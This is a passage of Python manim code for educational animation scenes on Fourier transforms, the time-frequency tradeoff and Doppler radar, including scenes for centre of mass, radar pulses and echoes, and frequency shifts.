def match_winding_to_beat_frequency(self):
self.v_lines_indicating_periods = self.get_v_lines_indicating_periods(0.3)
self.add(self.v_lines_indicating_periods)
for freq in range(1, 6):
self.change_frequency(freq, run_time = 5)
self.play(
*self.get_vector_animations(
self.time_graph,
draw_polarized_graph = False
),
run_time = 10
)
self.wait()
def follow_center_of_mass(self):
com_dot = self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
com_arrow = Arrow(UP+3*RIGHT, ORIGIN)
com_arrow.shift(com_dot.get_center())
com_arrow.match_color(com_dot)
com_words = TextMobject("Center of mass")
com_words.next_to(com_arrow.get_start(), UP)
com_words.match_color(com_arrow)
com_words.add_background_rectangle()
com_dot.save_state()
com_dot.move_to(com_arrow.get_start())
com_dot.fade(1)
self.play(
com_dot.restore,
GrowArrow(com_arrow, rate_func = squish_rate_func(smooth, 0.2, 1)),
Write(com_words),
)
self.wait()
squished_func = squish_rate_func(smooth, 0, 0.2)
self.change_frequency(
4,
added_anims = [
FadeOut(com_arrow, rate_func = squished_func),
FadeOut(com_words, rate_func = squished_func),
],
run_time = 5
)
def draw_fourier_plot(self):
frequency_axes = self.frequency_axes
fourier_label = self.fourier_label
self.change_frequency(0, run_time = 2)
self.play(
FadeIn(frequency_axes),
FadeIn(fourier_label),
)
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.get_fourier_graph_drawing_update_anim(fourier_graph)
self.generate_fourier_dot_transform(fourier_graph)
self.change_frequency(5, run_time = 20)
self.wait()
self.change_frequency(7.5, run_time = 10)
self.fourier_graph_drawing_update_anim = Animation(Mobject())
self.fourier_graph = fourier_graph
def set_color_spike(self):
spike_point = self.frequency_axes.input_to_graph_point(
5, self.fourier_graph
)
circle = Circle(color = YELLOW, radius = 0.25)
circle.move_to(spike_point)
circle.save_state()
circle.scale(5)
circle.fade(1)
self.change_frequency(5)
self.play(circle.restore)
self.play(FadeOut(circle))
self.wait()
for x in range(2):
self.change_frequency(5.2, run_time = 3)
self.change_frequency(4.8, run_time = 3)
self.change_frequency(5, run_time = 1.5)
self.wait()
#########
def get_time_graph(self, frequency = 5, width = 2, **kwargs):
# low_x = center-width/2
# high_x = center+width/2
# new_smooth = lambda x : np.clip(smooth((x+0.5)), 0, 1)
# def func(x):
# pure_signal = 0.9*np.cos(TAU*frequency*x)
# factor = new_smooth(x - low_x) - new_smooth(x-high_x)
# return 1 + factor*pure_signal
graph = self.time_axes.get_graph(
lambda x : 1+0.9*np.cos(TAU*frequency*x),
x_min = 0, x_max = width,
**kwargs
)
graph.set_color(YELLOW)
return graph
class RealPartOfInsert(Scene):
def construct(self):
words = TextMobject("(Real part of the)")
words.set_color(RED)
self.add(words)
self.play(Write(words))
self.wait(5)
class CenterOfMassDescription(FourierRecapScene):
def construct(self):
self.remove(self.pi_creature)
circle_plane = self.get_circle_plane()
circle_plane.save_state()
circle_plane.generate_target()
circle_plane.target.set_height(FRAME_HEIGHT)
circle_plane.target.center()
circle_plane.target.axes.set_stroke(width = 2)
circle_plane.targets.set_stroke(width = 2)
circle_plane.target.secondary_lines.set_stroke(width = 1)
start_coords = (0.5, 0.5)
alt_coords = (0.8, 0.8)
com_dot = Dot(color = self.center_of_mass_color)
com_dot.move_to(circle_plane.coords_to_point(*start_coords))
self.add(circle_plane, com_dot)
self.wait()
self.play(
MoveToTarget(circle_plane),
com_dot.move_to,
circle_plane.target.coords_to_point(*start_coords)
)
self.wait()
alt_com_dot = com_dot.copy().move_to(
circle_plane.coords_to_point(*alt_coords)
)
for dot in com_dot, alt_com_dot:
line = Line(ORIGIN, dot.get_center())
line.match_color(com_dot)
angle = line.get_angle()
line.rotate(-angle, about_point = ORIGIN)
brace = Brace(line, UP)
words = brace.get_text("Strength of frequency")
words.add_background_rectangle()
dot.length_label_group = VGroup(line, brace, words)
dot.length_label_group.rotate(angle, about_point = ORIGIN)
line, brace, words = com_dot.length_label_group
self.play(
GrowFromCenter(line),
GrowFromCenter(brace),
FadeIn(words),
)
self.wait()
self.play(
Transform(
com_dot.length_label_group,
alt_com_dot.length_label_group,
),
Transform(com_dot, alt_com_dot),
rate_func = there_and_back,
run_time = 4,
)
#Do rotation
line = com_dot.length_label_group[0]
com_dot.length_label_group.remove(line)
angle = line.get_angle()
arc, alt_arc = [
Arc(
start_angle = 0,
angle = factor*angle,
radius = 0.5,
)
for factor in (1, 2)
]
theta = TexMobject("\\theta")
theta.shift(1.5*arc.point_from_proportion(0.5))
self.play(
FadeOut(com_dot.length_label_group),
Animation(line),
ShowCreation(arc),
Write(theta)
)
self.play(
Rotate(
VGroup(line, com_dot),
angle, about_point = ORIGIN
),
Transform(arc, alt_arc),
theta.move_to, 1.5*alt_arc.point_from_proportion(0.5),
rate_func = there_and_back,
run_time = 4
)
self.wait()
class AskAboutLongVsShort(TeacherStudentsScene):
def construct(self):
self.student_says(
"What happens if we \\\\ change the length of \\\\ the signal?",
student_index = 2,
)
self.play(
self.teacher.change, "happy",
self.get_student_changes("pondering", "confused", "raise_right_hand")
)
self.wait(5)
class LongAndShortSignalsInWindingMachine(FourierRecapScene):
CONFIG = {
"num_fourier_graph_points" : 1000,
}
def construct(self):
self.setup_axes()
self.extend_for_long_time()
self.note_sharp_fourier_peak()
self.very_short_signal()
self.note_wide_fourier_peak()
def setup_axes(self):
FourierRecapScene.setup_axes(self)
self.add(self.circle_plane)
self.add(self.frequency_axes)
self.time_graph = self.graph = self.get_time_graph(width = 2)
self.add(self.time_graph)
self.force_skipping()
self.wrap_signal_around_circle()
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.fourier_graph = fourier_graph
self.add(fourier_graph)
self.change_frequency(5)
self.revert_to_original_skipping_status()
def extend_for_long_time(self):
short_time_graph = self.time_graph
long_time_graph = self.get_time_graph(
width = 10,
num_graph_points = 500,
)
long_time_graph.set_stroke(width = 2)
new_freq = 5.1
long_pol_graph = self.get_polarized_mobject(
long_time_graph,
freq = new_freq
)
fourier_graph = self.fourier_graph
self.change_frequency(new_freq)
self.play(
FadeOut(self.graph),
FadeOut(self.graph.polarized_mobject),
FadeOut(fourier_graph)
)
self.play(
ShowCreation(long_time_graph, rate_func=linear),
ShowCreation(long_pol_graph, rate_func=linear),
run_time = 5
)
self.wait()
self.time_graph = self.graph = long_time_graph
def note_sharp_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.time_graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 5.1)
def very_short_signal(self):
time_graph = self.time_graph
fourier_graph = self.fourier_graph
short_time_graph = self.get_time_graph(width = 0.6)
new_freq = 5.1
short_pol_graph = self.get_polarized_mobject(
short_time_graph,
freq = new_freq
)
self.play(
FadeOut(fourier_graph),
FadeOut(time_graph),
FadeOut(time_graph.polarized_mobject),
)
self.play(
ShowCreation(short_time_graph),
ShowCreation(short_time_graph.polarized_mobject),
)
self.graph = self.time_graph = short_time_graph
self.change_frequency(6.66, run_time = 5)
def note_wide_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 6.66)
###
def note_fourier_peak(self, fourier_graph, freq1, freq2):
fourier_graph = self.fourier_graph
dots = self.get_fourier_graph_dots(fourier_graph, freq1, freq2)
self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
self.generate_fourier_dot_transform(fourier_graph)
dot = self.fourier_graph_dot
arrow = Arrow(UP, ORIGIN, buff = SMALL_BUFF)
arrow.next_to(dot, UP, buff = SMALL_BUFF)
self.play(ShowCreation(fourier_graph))
self.change_frequency(freq1,
added_anims = [
MaintainPositionRelativeTo(arrow, dot),
UpdateFromAlphaFunc(
arrow,
lambda m, a : m.set_fill(opacity = a)
),
],
run_time = 3,
)
self.wait()
self.change_frequency(freq2,
added_anims = [
MaintainPositionRelativeTo(arrow, dot)
],
run_time = 3
)
self.wait()
self.play(*list(map(FadeOut, [
dot, arrow, self.center_of_mass_dot
])))
#This is not great...
for attr in "center_of_mass_dot", "fourier_graph_dot":
self.__dict__.pop(attr)
def get_fourier_graph_dots(self, fourier_graph, *freqs):
axis_point = self.frequency_axes.coords_to_point(4.5, -0.25)
dots = VGroup()
for freq in freqs:
point = self.frequency_axes.input_to_graph_point(freq, fourier_graph)
dot = Dot(point)
dot.scale(0.5)
dots.add(dot)
vect = point - axis_point
vect *= 1.3/get_norm(vect)
arrow = Arrow(vect, ORIGIN, buff = SMALL_BUFF)
arrow.set_color(YELLOW)
arrow.shift(point)
dot.arrow = arrow
return dots
class FocusRectangleInsert(FourierRecapScene):
CONFIG = {
"target_width" : 0.5
}
def construct(self):
self.setup_axes()
self.clear()
point = self.frequency_axes.coords_to_point(5, 0.25)
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect.set_stroke(YELLOW, 2)
self.add(rect)
self.wait()
self.play(
rect.stretch_to_fit_width, self.target_width,
rect.stretch_to_fit_height, 1.5,
rect.move_to, point,
run_time = 2
)
self.wait(3)
class BroadPeakFocusRectangleInsert(FocusRectangleInsert):
CONFIG = {
"target_width" : 1.5,
}
class CleanerFourierTradeoff(FourierTradeoff):
CONFIG = {
"show_text" : False,
"complex_to_real_func" : lambda z : z.real,
"widths" : [0.02, 6, 1],
}
class MentionDopplerRadar(TeacherStudentsScene):
def construct(self):
words = TextMobject("Doppler Radar")
words.next_to(self.teacher, UP)
words.save_state()
words.shift(DOWN).fade(1)
dish = RadarDish()
dish.next_to(self.students, UP, buff = 2, aligned_edge = LEFT)
plane = Plane()
plane.to_edge(RIGHT)
plane.align_to(dish)
always_shift(plane, LEFT, 1)
plane.flip()
pulse = RadarPulse(dish, plane)
look_at_anims = [
Mobject.add_updater(
pi, lambda pi : pi.look_at(pulse.mobject)
)
for pi in self.get_pi_creatures()
]
self.add(dish, plane, pulse, *look_at_anims)
self.play(
self.teacher.change, "hooray",
words.restore
)
self.change_student_modes("pondering", "erm", "sassy")
self.wait(2)
self.play(
self.teacher.change, "happy",
self.get_student_changes(*["thinking"]*3)
)
self.wait()
dish.set_stroke(width = 0)
self.play(UpdateFromAlphaFunc(
VGroup(plane, dish),
lambda m, a : m.set_fill(opacity = 1 - a)
))
class IntroduceDopplerRadar(Scene):
CONFIG = {
"frequency_spread_factor" : 100,
}
def construct(self):
self.setup_axes()
self.measure_distance_with_time()
self.show_frequency_shift()
self.show_frequency_shift_in_fourier()
def setup_axes(self):
self.dish = RadarDish()
self.dish.to_corner(UP+LEFT)
axes = Axes(
x_min = 0,
x_max = 10,
y_min = -1.5,
y_max = 1.5
)
axes.move_to(DOWN)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.time_label = time_label
axes.add(time_label)
self.axes = axes
self.add(self.dish)
self.add(axes)
def measure_distance_with_time(self):
dish = self.dish
axes = self.axes
distance = 5
time_diff = 5
speed = (2*distance)/time_diff
randy = Randolph().flip()
randy.match_height(dish)
randy.move_to(dish.get_right(), LEFT)
randy.shift(distance*RIGHT)
pulse_graph, echo_graph, sum_graph = \
self.get_pulse_and_echo_graphs(
self.get_single_pulse_graph,
(1,), (1+time_diff,)
)
words = ["Original signal", "Echo"]
for graph, word in zip([pulse_graph, echo_graph], words):
arrow = Vector(DOWN)
arrow.next_to(graph.peak_point, UP, SMALL_BUFF)
arrow.match_color(graph)
graph.arrow = arrow
label = TextMobject(word)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(graph)
graph.label = label
double_arrow = DoubleArrow(
pulse_graph.peak_point,
echo_graph.peak_point,
color = WHITE
)
distance_text = TextMobject("$2 \\times$ distance/(signal speed)")
distance_text.set_width(0.9*double_arrow.get_width())
distance_text.next_to(double_arrow, UP, SMALL_BUFF)
#v_line anim?
pulse = RadarPulseSingleton(
dish, randy,
speed = 0.97*speed, #Just needs slightly better alignment
)
graph_draw = turn_animation_into_updater(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 0.97*axes.x_max
)
)
randy_look_at = Mobject.add_updater(
randy, lambda pi : pi.look_at(pulse.mobject)
)
axes_anim = ContinualAnimation(axes)
self.add(randy_look_at, axes_anim, graph_draw)
self.wait(0.5)
self.add(pulse)
self.play(
Write(pulse_graph.label),
GrowArrow(pulse_graph.arrow),
run_time = 1,
)
self.play(randy.change, "pondering")
self.wait(time_diff - 2)
self.play(
Write(echo_graph.label),
GrowArrow(echo_graph.arrow),
run_time = 1
)
self.wait()
self.play(
GrowFromCenter(double_arrow),
FadeIn(distance_text)
)
self.wait()
self.remove(graph_draw, pulse, randy_look_at, axes_anim)
self.add(axes)
self.play(LaggedStartMap(FadeOut, VGroup(
sum_graph, randy,
pulse_graph.arrow, pulse_graph.label,
echo_graph.arrow, echo_graph.label,
double_arrow, distance_text
)))
def show_frequency_shift(self):
axes = self.axes
dish = self.dish
plane = Plane()
plane.flip()
plane.move_to(dish)
plane.to_edge(RIGHT)
time_diff = 6
pulse_graph, echo_graph, sum_graph = graphs = \
self.get_pulse_and_echo_graphs(
self.get_frequency_pulse_graph,
(1,25), (1+time_diff,50)
)
for graph in graphs:
graph.set_stroke(width = 3)
signal_graph = self.get_frequency_pulse_graph(1)
pulse_brace = Brace(Line(ORIGIN, RIGHT), UP)
pulse_brace.move_to(axes.coords_to_point(1, 1.2))
echo_brace = pulse_brace.copy()
echo_brace.stretch(0.6, 0)
echo_brace.move_to(axes.coords_to_point(7, 1.2))
pulse_text = pulse_brace.get_text("Original signal")
pulse_text.add_background_rectangle()
echo_text = echo_brace.get_text("Echo")
echo_subtext = TextMobject("(Higher frequency)")
echo_subtext.next_to(echo_text, RIGHT)
echo_subtext.match_color(echo_graph)
graph_draw = turn_animation_into_updater(
ShowCreation(sum_graph, run_time = 8, rate_func=linear)
)
pulse = RadarPulse(dish, plane, n_pulse_singletons = 12)
always_shift(plane, LEFT, 1.5)
self.add(graph_draw, pulse, plane)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = a)
))
self.play(
GrowFromCenter(pulse_brace),
FadeIn(pulse_text),
)
self.wait(3)
self.play(
GrowFromCenter(echo_brace),
GrowFromCenter(echo_text),
)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = 1-a)
))
#Only for when -s is run
graph_draw.update(10)
self.wait(0.1)
self.play(Write(echo_subtext, run_time = 1))
self.wait()
self.remove(graph_draw, pulse, plane)
pulse_graph.set_stroke(width = 0)
echo_graph.set_stroke(width = 0)
self.time_graph_group = VGroup(
axes, pulse_brace, pulse_text,
echo_brace, echo_text, echo_subtext,
pulse_graph, echo_graph, sum_graph,
)
self.set_variables_as_attrs(*self.time_graph_group)
def show_frequency_shift_in_fourier(self):
sum_graph = self.sum_graph
pulse_graph = self.pulse_graph
pulse_label = VGroup(self.pulse_brace, self.pulse_text)
echo_graph = self.echo_graph
echo_label = VGroup(
self.echo_brace, self.echo_text, self.echo_subtext
)
#Setup all fourier graph stuff
f_max = 0.02
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {"unit_size" : 0.5},
y_min = -f_max, y_max = f_max,
y_axis_config = {
"unit_size" : 50,
"tick_frequency" : 0.01,
},
)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP,
)
frequency_label.to_edge(RIGHT)
frequency_axes.add(frequency_label)
for graph in pulse_graph, echo_graph, sum_graph:
graph.fourier_transform = get_fourier_graph(
frequency_axes, graph.underlying_function,
frequency_axes.x_min, 25,
complex_to_real_func = abs,
)
#Braces labeling F.T.
original_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(7, 0.9*f_max),
frequency_axes.coords_to_point(9, 0.9*f_max),
),
UP,
).set_color(BLUE)
echo_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(14, 0.4*f_max),
frequency_axes.coords_to_point(18, 0.4*f_max),
),
UP,
).set_color(YELLOW)
# braces = [original_fourier_brace, echo_fourier_brace]
# words = ["original signal", "echo"]
# for brace, word in zip(braces, words):
# brace.add(brace.get_text("F.T. of \\\\ %s"%word))
fourier_label = TexMobject("||\\text{Fourier transform}||")
# fourier_label.next_to(sum_graph.fourier_transform, UP, MED_LARGE_BUFF)
fourier_label.next_to(frequency_axes.y_axis, UP, buff = SMALL_BUFF)
fourier_label.shift_onto_screen()
fourier_label.set_color(RED)
#v_lines
v_line = DashedLine(
frequency_axes.coords_to_point(8, 0),
frequency_axes.coords_to_point(8, 1.2*f_max),
color = YELLOW,
dash_length = 0.025,
)
v_line_pair = VGroup(*[
v_line.copy().shift(u*0.6*RIGHT)
for u in (-1, 1)
])
v_line = VGroup(v_line)
double_arrow = DoubleArrow(
frequency_axes.coords_to_point(8, 0.007),
frequency_axes.coords_to_point(16, 0.007),
buff = 0,
color = WHITE
)
self.play(
self.time_graph_group.to_edge, UP,
ApplyMethod(
self.dish.shift, 2*UP,
remover = True
),
FadeIn(frequency_axes)
)
self.wait()
self.play(
FadeOut(sum_graph),
FadeOut(echo_label),
pulse_graph.set_stroke, {"width" : 3},
)
self.play(
ReplacementTransform(
pulse_label[0].copy(),
original_fourier_brace
),
ShowCreation(pulse_graph.fourier_transform)
)
self.play(Write(fourier_label))
self.wait()
self.play(ShowCreation(v_line))
self.wait()
self.play(ReplacementTransform(v_line, v_line_pair))
self.wait()
self.play(FadeOut(v_line_pair))
self.wait()
self.play(
FadeOut(pulse_graph),
FadeIn(sum_graph),
ReplacementTransform(
pulse_graph.fourier_transform,
sum_graph.fourier_transform
)
)
self.play(FadeIn(echo_label))
self.play(ReplacementTransform(
echo_label[0].copy(),
echo_fourier_brace,
))
self.wait(2)
self.play(GrowFromCenter(double_arrow))
self.wait()
###
def get_graph(self, func, **kwargs):
graph = self.axes.get_graph(func, **kwargs)
graph.peak_point = self.get_peak_point(graph)
return graph
def get_single_pulse_graph(self, x, **kwargs):
return self.get_graph(self.get_single_pulse_function(x), **kwargs)
def get_single_pulse_function(self, x):
return lambda t : -2*np.sin(10*(t-x))*np.exp(-100*(t-x)**2)
def get_frequency_pulse_graph(self, x, freq = 50, **kwargs):
return self.get_graph(
self.get_frequency_pulse_function(x, freq),
num_graph_points = 700,
**kwargs
)
def get_frequency_pulse_function(self, x, freq):
factor = self.frequency_spread_factor
return lambda t : op.mul(
2*np.cos(2*freq*(t-x)),
min(np.exp(-(freq**2/factor)*(t-x)**2), 0.5)
)
def get_peak_point(self, graph):
anchors = graph.get_anchors()
return anchors[np.argmax([p[1] for p in anchors])]
def get_pulse_and_echo_graphs(self, func, args1, args2):
pulse_graph = func(*args1, color = BLUE)
echo_graph = func(*args2, color = YELLOW)
sum_graph = self.axes.get_graph(
lambda x : sum([
pulse_graph.underlying_function(x),
echo_graph.underlying_function(x),
]),
num_graph_points = echo_graph.get_num_curves(),
color = WHITE
)
sum_graph.background_image_file = "blue_yellow_gradient"
return pulse_graph, echo_graph, sum_graph
class DopplerFormulaInsert(Scene):
def construct(self):
formula = TexMobject(
"f_{\\text{echo}", "=",
"\\left(1 + \\frac{v}{c}\\right)",
"f_{\\text{pulse}}"
)
formula[0].set_color(BLUE)
formula[3].set_color(YELLOW)
randy = Randolph(color = BLUE_C)
formula.scale(1.5)
formula.next_to(randy, UP+LEFT)
formula.shift_onto_screen()
self.add(randy)
self.play(
LaggedStartMap(FadeIn, formula),
randy.change, "pondering", randy.get_bottom(),
)
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
class MentionPRFNuance(TeacherStudentsScene):
def construct(self):
title = TextMobject(
"Speed of light", "$\\gg$", "Speed of a plane"
)
title.to_edge(UP)
self.add(title)
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = 0, y_max = 2,
)
axes.next_to(title, DOWN, buff = MED_LARGE_BUFF)
frequency_label = TextMobject("Frequency")
frequency_label.scale(0.7)
frequency_label.next_to(axes.x_axis.get_right(), UP)
axes.add(frequency_label)
self.add(axes)
pulse_x, shift_x = 4, 6
pulse_graph = self.get_spike_graph(pulse_x)
shift_graph = self.get_spike_graph(shift_x)
shift_graph.set_stroke(YELLOW, 2)
peak_points = VGroup(pulse_graph.peak_point, shift_graph.peak_point)
self.add(pulse_graph)
brace = Brace(peak_points, UP, buff = SMALL_BUFF)
displayed_doppler_shift = TextMobject("How I'm showing the \\\\", "Doppler shift")
actual_doppler_shift = TextMobject("Actual\\\\", "Doppler shift")
doppler_shift_words = VGroup(displayed_doppler_shift, actual_doppler_shift)
doppler_shift_words.set_color(YELLOW)
doppler_shift_words.scale(0.75)
displayed_doppler_shift.next_to(brace, UP, buff = SMALL_BUFF)
actual_doppler_shift.move_to(pulse_graph.peak_point)
actual_doppler_shift.align_to(displayed_doppler_shift)
self.play(
Animation(pulse_graph),
self.teacher.change, "raise_right_hand",
run_time = 1
)
self.play(
ShowCreation(shift_graph),
FadeIn(brace),
Write(displayed_doppler_shift, run_time = 1),
self.get_student_changes(*3*["sassy"]),
)
self.play(
UpdateFromAlphaFunc(
shift_graph,
lambda g, a : Transform(
g, self.get_spike_graph(
interpolate(shift_x, pulse_x+0.01, a),
).match_style(shift_graph)
).update(1),
),
UpdateFromFunc(
brace,
lambda b : b.match_width(
peak_points, stretch = True
).next_to(peak_points, UP, SMALL_BUFF)
),
Transform(
displayed_doppler_shift, actual_doppler_shift,
rate_func = squish_rate_func(smooth, 0.3, 0.6)
),
run_time = 3
)
self.wait(2)
everything = VGroup(
title,
axes, pulse_graph, shift_graph,
brace, displayed_doppler_shift
)
rect = SurroundingRectangle(everything, color = WHITE)
everything.add(rect)
self.teacher_says(
"I'll ignore certain \\\\ nuances for now.",
target_mode = "shruggie",
added_anims = [
everything.scale, 0.4,
everything.to_corner, UP+LEFT,
UpdateFromAlphaFunc(
rect, lambda m, a : m.set_stroke(width = 2*a)
)
],
)
self.change_student_modes(*3*["hesitant"])
self.wait(2)
def get_spike_graph(self, x, color = RED, **kwargs):
graph = self.axes.get_graph(
lambda t : np.exp(-10*(t-x)**2)*np.cos(10*(t-x)),
color = color,
**kwargs
)
graph.peak_point = VectorizedPoint(self.axes.input_to_graph_point(x, graph))
graph.add(graph.peak_point)
return graph
class TimeAndFrequencyGivePositionAndVelocity(IntroduceDopplerRadar):
def construct(self):
x = 7
freq = 25
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -2, y_max = 2,
)
axes.center()
title = TextMobject("Echo signal")
title.next_to(axes.y_axis, UP)
axes.add(title)
axes.to_edge(UP)
graph = self.get_frequency_pulse_graph(x = x, freq = freq)
graph.background_image_file = "blue_yellow_gradient"
arrow = Arrow(
axes.coords_to_point(0, -1.5),
axes.coords_to_point(x, -1.5),
color = WHITE,
buff = SMALL_BUFF,
)
time = TextMobject("Time")
time.next_to(arrow, DOWN, SMALL_BUFF)
delta_x = 0.7
brace = Brace(
Line(
axes.coords_to_point(x-delta_x, 1),
axes.coords_to_point(x+delta_x, 1)
),
UP
)
frequency = TextMobject("Frequency")
frequency.set_color(YELLOW)
frequency.next_to(brace, UP, SMALL_BUFF)
time_updown_arrow = TexMobject("\\Updownarrow")
time_updown_arrow.next_to(time, DOWN, SMALL_BUFF)
freq_updown_arrow = time_updown_arrow.copy()
freq_updown_arrow.next_to(frequency, UP, SMALL_BUFF)
distance = TextMobject("Distance")
distance.next_to(time_updown_arrow, DOWN, SMALL_BUFF)
velocity = TextMobject("Velocity")
velocity.next_to(freq_updown_arrow, UP, SMALL_BUFF)
VGroup(freq_updown_arrow, velocity).match_style(frequency)
self.add(axes)
self.play(ShowCreation(graph))
self.play(
GrowArrow(arrow),
LaggedStartMap(FadeIn, time, run_time = 1)
)
self.play(
GrowFromCenter(brace),
LaggedStartMap(FadeIn, frequency, run_time = 1)
)
self.wait()
self.play(
GrowFromPoint(time_updown_arrow, time_updown_arrow.get_top()),
ReplacementTransform(
time.copy().fade(1),
distance
)
)
self.play(
GrowFromPoint(freq_updown_arrow, freq_updown_arrow.get_top()),
ReplacementTransform(
frequency.copy().fade(1),
velocity
)
)
self.wait()
class RadarOperatorUncertainty(Scene):
def construct(self):
dish = RadarDish()
dish.scale(3)
dish.move_to(4*RIGHT + 2*DOWN)
dish_words = TextMobject("3b1b industrial \\\\ enterprises")
dish_words.scale(0.25)
dish_words.set_stroke(BLACK, 0.5)
dish_words.set_color(BLACK)
dish_words.move_to(dish, DOWN)
dish_words.shift(SMALL_BUFF*(UP+2*LEFT))
dish.add(dish_words)
randy = Randolph()
randy.next_to(dish, LEFT, aligned_edge = DOWN)
bubble = randy.get_bubble(
width = 7,
height = 4,
)
echo_object = Square()
echo_object.move_to(dish)
echo_object.shift(FRAME_X_RADIUS*RIGHT)
pulse = RadarPulse(dish, echo_object, speed = 6)
plane = Plane().scale(0.5)
plane.move_to(bubble.get_bubble_center()+LEFT)
plane_cloud = ProbabalisticMobjectCloud(
plane,
fill_opacity = 0.3,
n_copies = 10,
)
plane_gdw = plane_cloud.gaussian_distribution_wrapper
vector_cloud = ProbabalisticVectorCloud(
center_func = plane_gdw.get_center,
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.scale(0.05)
vector_gdw.move_to(plane_gdw)
vector_gdw.shift(2*RIGHT)
self.add(randy, dish, bubble, plane_cloud, pulse)
self.play(randy.change, "confused")
self.wait(3)
self.add(vector_cloud)
for i in range(3):
for plane_factor, vector_factor, freq in (0.05, 10, 0.01), (20, 0.1, 0.1):
pulse.internal_time = 0
pulse.frequency = freq
self.play(
randy.change, "pondering", plane,
plane_gdw.scale, plane_factor,
vector_gdw.scale, vector_factor,
)
self.wait(2)
class AmbiguityInLongEchos(IntroduceDopplerRadar, PiCreatureScene):
CONFIG = {
"object_x_coords" : [7, 4, 6, 9, 8],
"frequency_spread_factor" : 200,
"n_pulse_singletons" : 16,
"pulse_frequency" : 0.025,
}
def construct(self):
self.setup_axes()
self.setup_objects()
self.send_long_pulse_single_echo()
self.introduce_multiple_objects()
self.use_short_pulse()
self.fourier_transform_of_one_pulse()
self.show_echos_of_moving_objects()
self.overlapping_frequenies_of_various_objects()
self.echos_of_long_pure_signal_in_frequency_space()
self.concentrated_fourier_requires_long_time()
def setup_axes(self):
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5,
)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
axes.center()
axes.shift(DOWN)
self.add(axes)
dish = self.dish = RadarDish()
dish.move_to(axes, LEFT)
dish.to_edge(UP, buff = LARGE_BUFF)
self.add(dish)
def setup_objects(self):
objects = self.objects = VGroup(
Plane().flip(),
SVGMobject(
file_name = "blimp",
color = BLUE_C,
height = 0.5,
),
SVGMobject(
file_name = "biplane",
color = RED_D,
height = 0.5,
),
SVGMobject(
file_name = "helicopter",
color = LIGHT_GREY,
height = 0.5,
).rotate(-TAU/24),
FalconHeavy(),
)
y_shifts = [0.25, 0, 0.5, 0.25, -0.5]
for x, y, obj in zip(self.object_x_coords, y_shifts, objects):
obj.move_to(self.axes.coords_to_point(x, 0))
obj.align_to(self.dish)
obj.shift(y*UP)
self.object_velocities = [
0.7*LEFT,
0.1*RIGHT,
0.4*LEFT,
0.4*RIGHT,
0.5*UP,
]
def send_long_pulse_single_echo(self):
x = self.object_x_coords[0]
plane = self.objects[0]
self.add(plane)
randy = self.pi_creature
self.remove(randy)
pulse_graph = self.get_frequency_pulse_graph(x)
pulse_graph.background_image_file = "blue_yellow_gradient"
pulse = self.get_pulse(self.dish, plane)
brace = Brace(
Line(
self.axes.coords_to_point(x-1, 1),
self.axes.coords_to_point(x+1, 1),
), UP
)
words = brace.get_text("Spread over time")
self.add(pulse)
self.wait()
squished_rate_func = squish_rate_func(smooth, 0.6, 0.9)
self.play(
ShowCreation(pulse_graph, rate_func=linear),
GrowFromCenter(brace, rate_func = squished_rate_func),
Write(words, rate_func = squished_rate_func),
run_time = 3,
)
self.remove(pulse)
self.play(FadeIn(randy))
self.play(PiCreatureBubbleIntroduction(
randy, "Who cares?",
bubble_class = ThoughtBubble,
bubble_kwargs = {
"direction" : LEFT,
"width" : 2,
"height": 1.5,
},
target_mode = "maybe",
look_at_arg = brace,
))
self.play(Blink(randy))
self.play(LaggedStartMap(
FadeOut, VGroup(
randy.bubble, randy.bubble.content,
brace, words,
)
))
self.curr_graph = pulse_graph
def introduce_multiple_objects(self):
objects = self.objects
x_coords = self.object_x_coords
curr_graph = self.curr_graph
randy = self.pi_creature
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
graphs.set_color_by_gradient(BLUE, YELLOW)
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
noise_function = lambda t : np.sum([
0.5*np.sin(f*t)/f
for f in (2, 3, 5, 7, 11, 13)
])
noisy_graph = self.axes.get_graph(
lambda t : sum_graph.underlying_function(t)*(1+noise_function(t)),
num_graph_points = 1000
)
for graph in sum_graph, noisy_graph:
graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(
LaggedStartMap(GrowFromCenter, objects[1:]),
FadeOut(curr_graph),
randy.change, "pondering"
)
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "confused"
)
self.remove(*pulses)
self.play(randy.change, "pondering")
self.play(Transform(
sum_graph, noisy_graph,
rate_func = lambda t : wiggle(t, 4),
run_time = 3
))
self.wait(2)
self.curr_graph = sum_graph
def use_short_pulse(self):
curr_graph = self.curr_graph
objects = self.objects
